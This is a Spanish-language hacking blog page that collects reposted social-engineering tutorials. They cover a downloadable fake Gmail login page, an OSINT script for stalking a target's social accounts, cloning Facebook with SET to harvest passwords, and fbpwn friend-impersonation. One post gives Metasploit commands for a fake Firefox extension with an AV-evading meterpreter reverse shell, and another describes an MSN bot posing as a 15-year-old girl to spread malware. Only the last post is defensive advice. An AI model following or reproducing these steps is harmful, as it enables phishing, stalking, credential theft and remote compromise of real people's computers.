Banner 1

Mostrando entradas con la etiqueta ingenieria social. Mostrar todas las entradas
Mostrando entradas con la etiqueta ingenieria social. Mostrar todas las entradas

Ingenieria social: Robar datos de gmail usando una página falsa

0 comentarios
Buenas tardes.

Es muy común realizar ataques de ingeniera social por distintos medios, entre tantos se encuentran los ataques de suplantación DNS, correos con "actualizaciones de cuentas, Hombre intermedio (combinado con DNS y ARP) y en todos ellos prima el SCAM (página falsa) para capturar los datos de acceso.

Recordemos que anteriormente era fácil capturarlos porque todos los datos viajaban por http y por ende texto plano, ahora es un poco mas complejo pues también se están implementado medidas de control frente al robo de sesiones haciendo mas difícil el robo de información.

Este método es quizás uno de los mas sencillos a nivel técnico pero es poco fiable pues contamos con muchos factores en contra, en todo caso pueden descargar  el archivo y subirlo local para empezar sus pruebas.


 
Scam de gmail

Lo pueden montar en una red local y realizar envenenamiento DNS y probar como les va, pronto realizare el laboratorio paso a paso para ir comprendiendo el nivel del ataque y cuan dañito puede ser.


Link de descarga: https://www.mediafire.com/?bno5xn7kwzllnlu

Fuente: http://www.masters-hackers.info/showthread.php?t=48086

Saludos roboticos.






Overstalk: extrae información de redes sociales

0 comentarios
 La idea que tuve era: ¿cuanta información, y hasta qué punto automatizada, puedo obtener de una persona sin quebrarme la cabeza?. Un buen punto de partida pueden ser los blogs, la gente publica ahí links hacia sus redes sociales. Recopilar los perfiles a los que enlaza desde el blog debe de ser desde luego el inicio. Dicho y hecho, script al canto:

 




     Vemos que hay cosillas interesantes, como su e-mail, su usuario en Yelp y en LastFM. Yelp es una red social donde, entre otras cosas, la gente puede indicar a qué eventos va a asistir -con dirección y hora-; y LastFM permite ver los gustos musicales de esa persona... Si por algún motivo estuviesemos interesado en esa persona, ya sabríamos donde poder abordarla y hacia donde conducir la conversación para tener puntos en común (películas, música, etc.). Pues vamos a ello:

Primero, ver en qué eventos va a estar:



Y ahora veamos qué música le gusta...




    Podríamos sacar más info de Yelp (le he añadido posibilidad de ver todas las amistades y también lugares preferidos), pero esto nos basta.

     Por otro lado también estuve oteando qué se cocía por su cuenta de steam. Saber sus videojuegos, y su "lista de videojuegos deseados" puede ser útil para realizar un ataque de phising (tenemos su e-mail, podemos obtener su steam ID y ver su lista de deseados; se le manda un e-mail spoofeando a Steam y ofreciendo una oferta de la metahostia para ese videojuego que desea):




  Después de ésto, pensé que sería interesante ver en qué redes sociales podemos encontrar un nick (porque la web de NameChk falla más que una escopetilla de plomos), asi que también script que te crió:



Probé con "XC3LL" (que no es mi nick, el mío lleva el The) y encontré bastante sitios donde hay user creado. Lo interesante sería combinar (con un bucle y un grep desde el propio termianl se podría) los resultados del principio (los perfiles extraídos del blog) con dónde está registrado, de tal forma que completaríamos bastante más la información.

No iba a publicar anda hasta después del Navaja, pero dejo este post de relleno donde muestro en qué me entretengo cuando no puedo pegar ojo.

El script está en el GitHub del blog ( https://github.com/0verl0ad/overstalk ) y conforme me vayan haciendo falta extraer info de algo, le meteré módulos. No voy a meterme anda de twitter, porque Creepy y Tinfoleak hacen ya un buen trabajo.

Fuente: http://blog.0verl0ad.com/2014/09/overstalk-extrae-informacion-de-redes.html

Clonando sitio web con Set ( Social Engineer Toolkit )

0 comentarios

Phishing - es el método mas utilizado por los ciberdelincuentes para estafar y obtener información de las victimas en este caso sobre el correo electrónico o usuario y la contraseña para el robo de dinero o de perfil del usuario en general , Clonando una pagina web donde lo enviara a la victima asiendo creer que es la web original y obtener toda su información en segundos.

Utilizando SET 

Abriremos primeramente el SET : 

 Aplicaciones > Kali Linux > Herramientas de Explotación > Herramienta de Ingeniería Social >setoolkit 


Lo primero que haremos sera poner el la opcion "1 " ,porque ?
porque simplemente utilizaremos el medio de ataque Ingiera social 






Como vemos nos sale otras 11 opciones la que nosotros escogeremos sera el numero " 2 " , porque utilizaremos un sitio web para clonar y crear el medio de ataque.




























Luego de ello nos saldra nuevamente otras 8 opciones donde nosotros pondremos el numero "3"
porque vamos a  clonar la web al igual que lo subirá en el servidor Local y a recibir los datos de la victima.




















Luego de ello nos saldrá nuevamente lo siguiente :














Le pondremos " 2 " . nos pedirá la IP  para crear el servidor infectado con el Pishing ! le procedemos a poner la IP "LOCAL" 192.168.10.104 "
luego nos parecerá una interrogante la cual nos dice que sitio web deseamos clonar :
en este caso lo mas utilizado "www.facebook.com" 






















Como vemos el servidor esta On  para verificar nuestro Pishing tecleamos nuestra IP que pusimos en este caso 192.168.10.104 en el navegador : 


























Lo que haremos sera enviarle el link  a la victima  y utilizar nuestro ingenio del metodo la cual sera emitido el mensaje y el link 

La victima una vez aya abierto el link , creera que es la web original  la cual pondrá sus datos del perfil en este caso :

























Luego de que la victima le haga clip en "iniciar sesión" automáticamente sera direccionado a la web original de facebook !, pero lo mejor es que ya hemos capturado los paquetes de datos la cual automáticamente sera visible en la terminal del Set 

Example : 




fbpwn: ingeniería social en Facebook (Multiplaforma)

0 comentarios
fbpwn es una herramienta multi-plataforma echa en java que construye un framework de ingeniería social para Facebook (en adelante FB), capaz de enviar solicitudes de amistad a una lista de perfiles y esperar las notificaciones de respuesta. Una vez que la víctima acepta la invitación, vuelca toda su información, fotos y lista de amigos en una carpeta local.

Un escenario típico de hacking con esta herramienta comienza con la recopilación de información de un perfil de usuario de FB. Los plugins son sólo una serie de operaciones normales en FB, automatizados para aumentar la probabilidad de obtención de información.

Normalmente, primero se crea una nueva cuenta en blanco para probar. A continuación, el plugin 'friending' añade todos los amigos de la víctima (para tener algunos amigos comunes). Entonces el complemento clonar nos pedirá que elijamos a uno de los amigos de la víctima. Este plugin de clonación sólo copia la imagen y el nombre para mostrar del amigo de la víctima elegida y lo configura para la cuenta autenticada. Después, se envía una solicitud de amigo a la cuenta de la víctima. Un dumper espera a que la víctima acepte la solicitud de amigo para empezar a guardar todas las páginas HTML accesibles (información, imágenes, etiquetas, etc ...) para un posterior análisis.

Después de unos minutos, puede que la víctima se percate de que la cuenta es falsa y la elimine de su lista de amigos, ¡pero es probable que sea demasiado tarde!


WebSite: http://code.google.com/p/fbpwn/
FUENTE:http://andres-elladooscuro.blogspot.com/2012/07/fbpwn-ingenieria-social-en-facebook.html

Comprometiendo un equipo mediante una extension de Firefox falsa

0 comentarios
Mediante ingeniería social intentaremos que un usuario instale una extensión de Firefox falsa para obtener una sesión remota en su sistema.

A través del módulo de Metasploit firefox_xpi_bootstrapped_addon, crearemos un fichero .xpi que será presentado a la víctima dentro de una página web. Cuando el usuario la visite, su navegador Firefox le preguntará si confía y desea instalar la extensión. Si el usuario hace clic en 'instalar' se ejecutará el payload con los permisos del usuario.

Haremos una simple demostración contra un Windows XP SP3.

1. Primero abrimos la consola de metasploit (msfconsole), actualizamos y cargamos el módulo correspondiente:



msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf  exploit(firefox_xpi_bootstrapped_addon) >

2. Ahora procedemos a configurar el addon:


msf  exploit(firefox_xpi_bootstrapped_addon) > set addonname falso
addonname => falso
msf  exploit(firefox_xpi_bootstrapped_addon) > set SRVHOST 192.168.1.35
SRVHOST => 192.168.1.35
msf  exploit(firefox_xpi_bootstrapped_addon) > set SRVPORT 80
SRVPORT => 80
msf  exploit(firefox_xpi_bootstrapped_addon) > set URIPATH fakeEx
URIPATH => fakeEx
msf  exploit(firefox_xpi_bootstrapped_addon) > set LHOST 192.168.1.35
LHOST => 192.168.1.35

3. A continuación preparamos nuestro payload para intentar que el AV no lo detecte. Primero con msfvenom:


D:\metasploit4>ruby\bin\ruby.exe msf3\msfvenom --payload windows/meterpreter/reverse_tcp --format exe --encoder x86/shikata_ga_nai --iterations 10 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c LHOST=192.168.1.35 > trojan.exe
[*] x86/jmp_call_additive succeeded with size 321 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 353 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 385 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 417 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 449 (iteration=5)

Luego tendréis que utilizar también otro crypter si queréis que vuestro payload sea lo más FuD posible... así que no cuesta nada modificar un stub y utilizar alguno de esos tan sexys que hay en la Red ;)

Después cargamos el payload para nuestro módulo:

msf  exploit(firefox_xpi_bootstrapped_addon) > set PAYLOADFILE d:\\metasploit4\\trojan.exe
PAYLOADFILE => d:\metasploit4\trojan.exe
payload => windows/meterpreter/reverse_tcp

Y lanzamos el exploit:


msf  exploit(firefox_xpi_bootstrapped_addon) > exploit
[*] Exploit running as background job.
msf  exploit(firefox_xpi_bootstrapped_addon) >
[*] Started reverse handler on 192.168.1.35:4444
[*] Using URL: http://192.168.1.35:80/fakeEx
[*] Server started.

4. Ahora que tenemos todo funcionando sólo necesitamos que el usuario visite nuestra URL (correo, MITM, DNS, ...) y que instale la extensión falsa de Firefox:


msf  exploit(firefox_xpi_bootstrapped_addon) >
[*] 192.168.1.35     firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...


Si cae en la trampa, obtendremos la sesión remota:



[*] Sending stage (752128 bytes) to 192.168.1.35
[*] Meterpreter session 1 opened (192.168.1.35:4444 -> 192.168.1.35:15831) at 2012-05-28 19:11:57 +0200

msf  exploit(firefox_xpi_bootstrapped_addon) > sessions -i

Active sessions
===============

  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter x86/win32               192.168.1.35:4444 -> 192.168.1.35:15831 (192.168.1.35)

Fuente:
http://underc0de.org/foro/hacking-basico/comprometiendo-un-equipo-mediante-una-extension-de-firefox-falsa/

Creando un [BOT MSN] Con fines de esparcir un Malware

0 comentarios
Bueno a estructurar el Malware
Procederemos a crearnos una Cuenta en la Siguiente web y a descargar nuestra IBOX PLATAFORM


http://sp.incesoft.com
Nota: es una Plataforma para Bots [SOFTWARE] que nos permitira la configuracion total del IBOT

Un formulario comun y corriente

Una ves teniendo una cuenta nos decidimos a la Configuracion externa de nuestro BOT como lo es.. MENSAJE - AVATAR - NICK y todo... Esto lo haremos con el fin de simular un user comun y corriente.
No Daremos Pistas de que es un BOT
Para ello en la Imagen me decidi a simular una Chica Aproximadamente de 15 Años que solo busca Amigos..
Se llama Laura su pic es de una chica llamativa y cosas asi...

Actualizamos la Informacion y Guardamos

Basic Info: Informacion simple del BOT.. servidor CHINA mensajes y todo pero solo es en tu cuenta! no se vera en el BOT MSN CONTACT

Robot Account: Ahi es donde agregan sus cuentas de MSN para que vivan los bots, y las administran , pueden cambiar sus contraseñas, ver que usuarios lo agregaron, etc.


Display Pictures: Cambian las imagenes que puede tener el bot



My Emotions: Agrega emoticones personalizados

Your Files: podremos subir archivos que se le enviarian a los contactos
Nuestro caso, algun malware.


La cuenta Hotmail que Agregaran en Msn Account management debe ser REAL y que quede acorde a los datos para pasar desapersividos
si tu Nick es LAURA create un MSN masomenos asi

lau-67548-linda@hotmail.com
Eso es creible pero no haras incoherencias como:
elmejor-man@hotmail.com
Sopechoso no ¿?
Despues de este paso decidiremos hacer CONECTAR y DARLE VIDA A FRANKESTEIN XD!.. pero Primero configuraremos que Dira... que Preguntara y como Actuara!..

Ya despues de terminar la configuracion procedemos a descargar los Sources JAVA SDK, COM SDK

Configurando el interior

Una ves descargado todo tendremos que tener conocimientos en el lenguaje BASE: JAVA, como no quiero alargar este articulo no muestro esas partes.

1- Debemos tener en cuenta la conversacion: debe ser Coherente, debe tener preguntas y respuestas previas:

EJEMPLO

BoT: Hola!
user: hola
bot: como estas?
user: bien y tu?
bot: bien, quieres ver mi foto?
user: si
bot: mira: [Link malicioso]

Pues Bueno... Ahora Como Infectaremos con Algun malware ¿?
Procedemos a Subir un .EXE ya sea un Server de BOTNET o Troyano o un SHD o un SERVER PROXY o FTPSERVER lo que quieran... a algun Hosting personal o nuevo y lo metemos en medio de la conversacion del IBOT
En mi caso hice mi BOT de esta Manera...

BOT: Hola
User: Hola
BOT: como estas¿?
User: bn y tu , quien eres?
BOT: yo estoy bien.. soy Laura tengo 15 Años y busco amigos
User: mm ya
BOT: tengo fotos y una Pagina :)
BOT: mi pagina es http://www.webconmalware.com/index.php
User: Me pide que baje un Archivo¿?
BOT: ahh se me olvidaba para verla bien debes bajar el Complemento de videos
User: ahh OKz!

El Index.php de mi web tiene un REDIRECT hacia un .exe y q se autodescargue y que imprima una alerta que diga.. "Necesita Bajar el Sgte Complemento"
La persona lo baja y listo!!


Como difundir Nuestro Correo BOT¿?
muy simple, exportando listas de contactos y agregandolas al msn bot, usando mailist entre muchas mas.

Analizando todo, ya ven como convertir una simple APP en una potente herramienta de Marketing o malwaring? incluso crimeware.

FUENTE:http://maztor.blogspot.com/2011/06/creando-un-bot-msn-con-fines-de.html

Ingenieria Social - Que es? Casos reales

0 comentarios

Ingenieria Social - Que es? Casos reales


» Ingenieria Social [aka Social Engineering]

Quote relacionada [!]

"A good social engineer plans his attack like a chess game, anticipating the questions his target might ask so he can be ready with the proper answers" .- Kevin Mitnick, The Art Of Deception. [Chapter 4]

"Usted puede tener la mejor tecnología, firewalls, sistemas de detección de ataques, dispositivos biométricos, etc. Lo único que se necesita es un llamado a un empleado desprevenido e ingresan sin más. Tienen todo en sus manos." Kevin Mitnick.

"La gente quiere ser agradable y no pretende armar un escándalo, pero es importante enseñarles a decir no. No debe haber sutilezas cuando lo que está en juego son nuestros ingresos." Allan Vance

Bajo el nombre de Ingeniería Social (literalmente traducido del inglés Social Engineering) se encuentran comprendidas todas aquellas conductas útiles para conseguir información de las personas cercanas a una computadora. Es una disciplina que consiste, ni más ni menos en sacar información a otra persona sin que esta sé de cuenta de que te esta revelando "información sensible".

Hoy en día sólo son necesarias las malas intenciones y una conexión a Internet para sembrar el caos. Ya no es cuestión de conocimientos, sobre todo teniendo en cuenta que en los sistemas operativos más populares, se antepone la comodidad a la seguridad del sistema mismo. La mayoría de los ataques a la seguridad se deben a errores humanos y no a fallas electrónicas. Los intrusos usan "ingeniería social" para acceder a los sitios, y siempre alguien los deja entrar sin ningún problema.

Quote relacionada [!]

"Roba al cielo y pon alli un sol falso" Retorno a los orígenes (Daoren) Proverbio Chino

Tradicionalmente, los intrusos se han valido de los engaños para conseguir atacar al eslabón más débil de la cadena de usuarios y responsables de un equipo de cómputo o de una red. De nada vale encriptar las comunicaciones, sellar los accesos, diseñar un buen esquema de seguridad para las distintas estaciones de trabajo y jerarquizar convenientemente los accesos a los mismos si no contamos con un personal que se halle lo suficientemente preparado para hacerle frente los engaños externos.

La principal herramienta que manejan actualmente los creadores de virus es la que se ha dado en llamar ingeniería social. Con este curioso término se engloba una serie de tretas, artimañas y engaños elaborados cuyo fin es confundir al usuario o, peor todavía, lograr que comprometa seriamente la seguridad de sus sistemas. Esto no es un conocimiento exacto pero, al ponerse en práctica con un grupo tan elevado de posibles víctimas, el éxito casi siempre está garantizado. Aprovechando sentimientos tan variados como la curiosidad, la avaricia, el sexo, la compasión o el miedo, el vándalo interesado consigue su objetivo, una acción por parte del usuario.

Quote relacionada [!] "In fact, female social engineers have a distinct advafntage because they can use their sexuality to obtain cooperation". Kevin Mitnick, The Art Of Deception. [Chapter 4]

Un claro ejemplo de Ingeniería Social más común es el de alguien que llama por teléfono a una empresa para decir que necesita ayuda o hablar con el administrador de la red porque hay que modificar algún aspecto de la configuración. Durante la conversación, y a través de escogidas y cuidadas preguntas, el atacante obtendrá los datos (como los códigos de acceso a los equipos) que necesita para vulnerar la seguridad de todo el corporativo.

La ingeniería social es una acción muy simple, pero peligrosa. Los "hackers" llaman a los centros de datos y fingen ser un cliente que perdió su contraseña, o se dirigen a un sitio y esperan que alguien deje la puerta abierta. Otras formas de ingeniería social no son tan obvias. Los "hackers" son conocidos por crear sitios Web, concursos o cuestionarios falsos que piden a los usuarios que ingresen una contraseña. Si un usuario escribe la misma contraseña que usa en su trabajo, el hacker puede ingresar en las instalaciones sin tener que descifrar ni siquiera una línea de código.
Quote relacionada [!]

"Many people look arround until they find a better deal; social engineers don´t look for a better deal, they find a way to make a deal better." Kevin Mitnick, The Art Of Deception. [Chapter 4]

Con el objetivo de infectar el mayor número posible de equipos, cada vez son más los gusanos que recurren a la Ingeniería Social, habitualmente empleada por los creadores de código malicioso para engañar a los usuarios. En la Ingeniería Social no se emplea ningún programa de software o elemento de hardware, sólo grandes dosis de ingenio, sutileza y persuasión para así lograr obtener información a través de otra persona sin que se dé cuenta de que está revelando información importante con la que, además, el atacante puede dañar su computadora.

En la práctica, los autores de virus (gusanos o troyanos) emplean la Ingeniería Social para que sus creaciones se propaguen rápidamente. Para ello atraen la atención del usuario y consiguen que realice alguna acción que, normalmente, consiste en inducirlo a que abra algún archivo que es el que procede a realizar la infección. De hecho, la mayoría de las pérdidas provocadas por los efectos de los códigos maliciosos tienen su origen en la ignorancia u omisión de políticas de seguridad.
Quote relacionada [!]

"Many people look arround until they find a better deal; social engineers don´t look for a better deal, they find a way to make a deal better." Kevin Mitnick, The Art Of Deception. [Chapter 4]

El personal de una empresa debería de seguir las siguientes recomendaciones para evitar caer víctima de las trampas de la Ingeniería Social:

1. - Antes de abrir los correos analizarlos con un antivirus eficaz y debidamente actualizado, ya que cualquier mensaje de correo electrónico puede contener códigos maliciosos aunque no le acompañe el símbolo de datos adjuntos.

2. - Nunca ejecutar un programa de procedencia desconocida, aun cuando previamente sea verificado que no contiene virus. Dicho programa puede contener un troyano o un sniffer que reenvíe nuestra clave de acceso.

3. - Los usuarios no necesitan tener acceso a todo tipo de ficheros ya que no todos son necesarios para su trabajo habitual, por ello puede ser conveniente por parte del administrador bloquear la entrada de ficheros con extensiones ".exe",".vbs", etc.

4. - Nunca informe telefónicamente de las características técnicas de la red, sus localizaciones espaciales o personas a cargo de la misma. En su lugar lo propio es remitirlos directamente al responsable del sistema.

5.- Controlar los accesos físicos al lugar donde se hallan los servidores o terminales desde los que se puede conectar con los servicios centralizados de control.

6.- Nunca tirar documentación técnica a la basura, sino destruirla.

7.- Verificar previamente la veracidad de la fuente que solicite cualquier información sobre la red, su localización en tiempo y espacio y las personas que se encuentran al frente de la misma.

8.- En caso de existir, instalar los parches de actualización de software que publican las compañías para solucionar vulnerabilidades. De esta manera se puede hacer frente a los efectos que puede provocar la ejecución de archivos con códigos maliciosos.

10.- Controlar que las anteriores instrucciones se cumplen sistemáticamente.

fuente: http://www.lcu.com.ar/ingenieriasocial/
Powered by Bad Robot
Helped by Blackubay